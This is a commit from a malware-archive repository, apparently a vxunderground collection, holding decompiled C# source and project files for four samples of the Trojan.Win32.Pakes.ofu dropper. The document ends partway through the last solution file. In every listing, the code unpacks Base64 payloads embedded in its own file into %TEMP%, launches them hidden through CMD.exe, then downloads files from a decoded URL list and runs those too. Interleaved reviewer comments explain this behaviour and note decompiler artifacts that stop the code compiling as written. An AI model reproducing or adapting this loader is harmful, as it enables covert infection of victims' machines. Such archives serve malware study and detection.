auto-decompiled msil via petikvx

add
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,133 @@
// Decompiled with JetBrains decompiler
// Type: n.C
// Assembly: g, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BF8D38A2-3CA7-4EC1-9420-BC56FCE07E26
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-25e8fc195a385066e680fc2fa54f23e0d4e8e119fa566f97d4c27b0b12ebd8e5.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections;
using System.Net;
using System.Text;
namespace n
{
public class C
{
[STAThread]
public static void main()
{
string str1 = "CMD.exe /k start %TEMP%\\";
string Expression1 = "TEMP";
try
{
C c1 = new C();
Array Instance1 = (Array) Strings.Split(System.IO.File.ReadAllText(AppDomain.CurrentDomain.FriendlyName), "**");
Array Instance2 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 1
}, (string[]) null)), "&");
Array Instance3 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 0
}, (string[]) null)), "\r\n");
Array Instance4 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 1
}, (string[]) null)), "\r\n");
int num1 = checked (Instance4.Length - 2);
int num2 = 0;
while (num2 <= num1)
{
try
{
System.IO.File.WriteAllBytes(Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\" + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), c1.v(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance4, new object[1]
{
(object) num2
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), AppWinStyle.Hide);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
checked { ++num2; }
}
if (Operators.CompareString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 2
}, (string[]) null).ToString(), "^", false) == 0)
return;
C c2 = c1;
Array Instance5 = Instance1;
object[] objArray1 = new object[1];
object[] objArray2 = objArray1;
int num3 = 2;
// ISSUE: variable of a boxed type
__Boxed<int> local1 = (ValueType) num3;
objArray2[0] = (object) local1;
object[] Arguments = objArray1;
string str2 = Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance5, Arguments, (string[]) null));
ref string local2 = ref str2;
string Expression2 = c2.t(ref local2);
NewLateBinding.LateIndexSetComplex((object) Instance1, new object[2]
{
(object) num3,
(object) str2
}, (string[]) null, true, false);
Array array = (Array) Strings.Split(Expression2, "\r\n");
int num4 = 0;
try
{
foreach (object obj in array)
{
string str3 = Conversions.ToString(obj);
try
{
if (Operators.CompareString(str3, "", false) == 0)
ProjectData.EndApp();
Array Instance6 = (Array) Strings.Split(str3, ".");
new WebClient().DownloadFile(str3, Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + "F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))), AppWinStyle.Hide);
checked { ++num4; }
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public byte[] v(string s) => Convert.FromBase64String(s);
public string t(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
}
}
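Review bot: `main()` carries no analyst header, and the decompiler's names (`Instance1`–`Instance6`, `v`, `t`) hide the behaviour; I would add a short comment block above `public static void main()` summarising it. From the visible lines: it reads its own file (`AppDomain.CurrentDomain.FriendlyName`), splits the text on `**`, `&` and CRLF, Base64-decodes each embedded blob to `%TEMP%\<n>.<ext>` and starts it through `CMD.exe /k start` with `AppWinStyle.Hide`; unless field 2 equals `^`, it then Base64-decodes a URL list, saves each entry with `WebClient.DownloadFile` as `%TEMP%\F<n>.<ext>` and starts it the same way. The comment should also record that every failure is swallowed by the `SetProjectError`/`ClearProjectError` pairs, and that the useful detection points are the numbered files in `%TEMP%` and the hidden `CMD.exe /k start` child process. This applies equally to the four later C.cs sections on the page, which share the MVID and look identical apart from the sample path; that suggests one fixed stub whose payload data differs per sample.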
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-25e8fc195a385066e680fc2fa54f23e0d4e8e119fa566f97d4c27b0b12ebd8e5.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{0B110C2F-2FD2-4496-B4D0-E4C3A5120AAA}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>g</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>n</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="C.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "g", "Trojan.Win32.Pakes.ofu-25e8fc195a385066e680fc2fa54f23e0d4e8e119fa566f97d4c27b0b12ebd8e5.csproj", "{0B110C2F-2FD2-4496-B4D0-E4C3A5120AAA}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{0B110C2F-2FD2-4496-B4D0-E4C3A5120AAA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{0B110C2F-2FD2-4496-B4D0-E4C3A5120AAA}.Debug|Any CPU.Build.0 = Debug|Any CPU
{0B110C2F-2FD2-4496-B4D0-E4C3A5120AAA}.Release|Any CPU.ActiveCfg = Release|Any CPU
{0B110C2F-2FD2-4496-B4D0-E4C3A5120AAA}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,133 @@
// Decompiled with JetBrains decompiler
// Type: n.C
// Assembly: g, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BF8D38A2-3CA7-4EC1-9420-BC56FCE07E26
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-873a343cb63109941836b54a86a0bc4309b1ed0f7b6f17e1cb45a08be013d73e.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections;
using System.Net;
using System.Text;
namespace n
{
public class C
{
[STAThread]
public static void main()
{
string str1 = "CMD.exe /k start %TEMP%\\";
string Expression1 = "TEMP";
try
{
C c1 = new C();
Array Instance1 = (Array) Strings.Split(System.IO.File.ReadAllText(AppDomain.CurrentDomain.FriendlyName), "**");
Array Instance2 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 1
}, (string[]) null)), "&");
Array Instance3 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 0
}, (string[]) null)), "\r\n");
Array Instance4 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 1
}, (string[]) null)), "\r\n");
int num1 = checked (Instance4.Length - 2);
int num2 = 0;
while (num2 <= num1)
{
try
{
System.IO.File.WriteAllBytes(Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\" + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), c1.v(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance4, new object[1]
{
(object) num2
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), AppWinStyle.Hide);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
checked { ++num2; }
}
if (Operators.CompareString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 2
}, (string[]) null).ToString(), "^", false) == 0)
return;
C c2 = c1;
Array Instance5 = Instance1;
object[] objArray1 = new object[1];
object[] objArray2 = objArray1;
int num3 = 2;
// ISSUE: variable of a boxed type
__Boxed<int> local1 = (ValueType) num3;
objArray2[0] = (object) local1;
object[] Arguments = objArray1;
string str2 = Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance5, Arguments, (string[]) null));
ref string local2 = ref str2;
string Expression2 = c2.t(ref local2);
NewLateBinding.LateIndexSetComplex((object) Instance1, new object[2]
{
(object) num3,
(object) str2
}, (string[]) null, true, false);
Array array = (Array) Strings.Split(Expression2, "\r\n");
int num4 = 0;
try
{
foreach (object obj in array)
{
string str3 = Conversions.ToString(obj);
try
{
if (Operators.CompareString(str3, "", false) == 0)
ProjectData.EndApp();
Array Instance6 = (Array) Strings.Split(str3, ".");
new WebClient().DownloadFile(str3, Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + "F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))), AppWinStyle.Hide);
checked { ++num4; }
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public byte[] v(string s) => Convert.FromBase64String(s);
public string t(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
}
}
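Review bot: This listing is decompiler output that will not compile as written: `__Boxed<int> local1 = (ValueType) num3;` uses a decompiler pseudo-type, and the `finally` block declares `IEnumerator enumerator;` and tests it without ever assigning it. The entry point is also spelled `main`, which the C# compiler does not accept as a program entry point, so the exported .csproj and .sln next to it give a misleading impression of buildable source. A one-line comment near those lines, for example `// NOTE: decompiler artifact, not valid C#; read-only analysis listing`, would make that explicit. The same artifacts appear in every C.cs section on this page.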
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-873a343cb63109941836b54a86a0bc4309b1ed0f7b6f17e1cb45a08be013d73e.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{0129350B-04DD-4692-8B44-3346B917343B}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>g</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>n</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="C.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "g", "Trojan.Win32.Pakes.ofu-873a343cb63109941836b54a86a0bc4309b1ed0f7b6f17e1cb45a08be013d73e.csproj", "{0129350B-04DD-4692-8B44-3346B917343B}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{0129350B-04DD-4692-8B44-3346B917343B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{0129350B-04DD-4692-8B44-3346B917343B}.Debug|Any CPU.Build.0 = Debug|Any CPU
{0129350B-04DD-4692-8B44-3346B917343B}.Release|Any CPU.ActiveCfg = Release|Any CPU
{0129350B-04DD-4692-8B44-3346B917343B}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,133 @@
// Decompiled with JetBrains decompiler
// Type: n.C
// Assembly: g, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BF8D38A2-3CA7-4EC1-9420-BC56FCE07E26
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-8b62968991a246db6bea26242d4308b0eef7c30da89d5072329aa6fa5592a700.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections;
using System.Net;
using System.Text;
namespace n
{
public class C
{
[STAThread]
public static void main()
{
string str1 = "CMD.exe /k start %TEMP%\\";
string Expression1 = "TEMP";
try
{
C c1 = new C();
Array Instance1 = (Array) Strings.Split(System.IO.File.ReadAllText(AppDomain.CurrentDomain.FriendlyName), "**");
Array Instance2 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 1
}, (string[]) null)), "&");
Array Instance3 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 0
}, (string[]) null)), "\r\n");
Array Instance4 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 1
}, (string[]) null)), "\r\n");
int num1 = checked (Instance4.Length - 2);
int num2 = 0;
while (num2 <= num1)
{
try
{
System.IO.File.WriteAllBytes(Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\" + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), c1.v(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance4, new object[1]
{
(object) num2
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), AppWinStyle.Hide);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
checked { ++num2; }
}
if (Operators.CompareString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 2
}, (string[]) null).ToString(), "^", false) == 0)
return;
C c2 = c1;
Array Instance5 = Instance1;
object[] objArray1 = new object[1];
object[] objArray2 = objArray1;
int num3 = 2;
// ISSUE: variable of a boxed type
__Boxed<int> local1 = (ValueType) num3;
objArray2[0] = (object) local1;
object[] Arguments = objArray1;
string str2 = Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance5, Arguments, (string[]) null));
ref string local2 = ref str2;
string Expression2 = c2.t(ref local2);
NewLateBinding.LateIndexSetComplex((object) Instance1, new object[2]
{
(object) num3,
(object) str2
}, (string[]) null, true, false);
Array array = (Array) Strings.Split(Expression2, "\r\n");
int num4 = 0;
try
{
foreach (object obj in array)
{
string str3 = Conversions.ToString(obj);
try
{
if (Operators.CompareString(str3, "", false) == 0)
ProjectData.EndApp();
Array Instance6 = (Array) Strings.Split(str3, ".");
new WebClient().DownloadFile(str3, Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + "F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))), AppWinStyle.Hide);
checked { ++num4; }
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public byte[] v(string s) => Convert.FromBase64String(s);
public string t(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
}
}
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-8b62968991a246db6bea26242d4308b0eef7c30da89d5072329aa6fa5592a700.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{DEE76809-D1B4-4A67-95CD-3C9206BAFECF}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>g</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>n</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="C.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "g", "Trojan.Win32.Pakes.ofu-8b62968991a246db6bea26242d4308b0eef7c30da89d5072329aa6fa5592a700.csproj", "{DEE76809-D1B4-4A67-95CD-3C9206BAFECF}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{DEE76809-D1B4-4A67-95CD-3C9206BAFECF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{DEE76809-D1B4-4A67-95CD-3C9206BAFECF}.Debug|Any CPU.Build.0 = Debug|Any CPU
{DEE76809-D1B4-4A67-95CD-3C9206BAFECF}.Release|Any CPU.ActiveCfg = Release|Any CPU
{DEE76809-D1B4-4A67-95CD-3C9206BAFECF}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,133 @@
// Decompiled with JetBrains decompiler
// Type: n.C
// Assembly: g, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BF8D38A2-3CA7-4EC1-9420-BC56FCE07E26
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-9c0e9addf7e09323776486d50764f39d7556b844377e327710c138cb308804d0.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections;
using System.Net;
using System.Text;
namespace n
{
public class C
{
[STAThread]
public static void main()
{
string str1 = "CMD.exe /k start %TEMP%\\";
string Expression1 = "TEMP";
try
{
C c1 = new C();
Array Instance1 = (Array) Strings.Split(System.IO.File.ReadAllText(AppDomain.CurrentDomain.FriendlyName), "**");
Array Instance2 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 1
}, (string[]) null)), "&");
Array Instance3 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 0
}, (string[]) null)), "\r\n");
Array Instance4 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 1
}, (string[]) null)), "\r\n");
int num1 = checked (Instance4.Length - 2);
int num2 = 0;
while (num2 <= num1)
{
try
{
System.IO.File.WriteAllBytes(Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\" + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), c1.v(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance4, new object[1]
{
(object) num2
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), AppWinStyle.Hide);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
checked { ++num2; }
}
if (Operators.CompareString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 2
}, (string[]) null).ToString(), "^", false) == 0)
return;
C c2 = c1;
Array Instance5 = Instance1;
object[] objArray1 = new object[1];
object[] objArray2 = objArray1;
int num3 = 2;
// ISSUE: variable of a boxed type
__Boxed<int> local1 = (ValueType) num3;
objArray2[0] = (object) local1;
object[] Arguments = objArray1;
string str2 = Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance5, Arguments, (string[]) null));
ref string local2 = ref str2;
string Expression2 = c2.t(ref local2);
NewLateBinding.LateIndexSetComplex((object) Instance1, new object[2]
{
(object) num3,
(object) str2
}, (string[]) null, true, false);
Array array = (Array) Strings.Split(Expression2, "\r\n");
int num4 = 0;
try
{
foreach (object obj in array)
{
string str3 = Conversions.ToString(obj);
try
{
if (Operators.CompareString(str3, "", false) == 0)
ProjectData.EndApp();
Array Instance6 = (Array) Strings.Split(str3, ".");
new WebClient().DownloadFile(str3, Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + "F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))), AppWinStyle.Hide);
checked { ++num4; }
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public byte[] v(string s) => Convert.FromBase64String(s);
public string t(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
}
}
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-9c0e9addf7e09323776486d50764f39d7556b844377e327710c138cb308804d0.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{6EDE12CE-6227-4D5B-8BDA-873B05B7D2A9}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>g</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>n</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="C.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "g", "Trojan.Win32.Pakes.ofu-9c0e9addf7e09323776486d50764f39d7556b844377e327710c138cb308804d0.csproj", "{6EDE12CE-6227-4D5B-8BDA-873B05B7D2A9}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
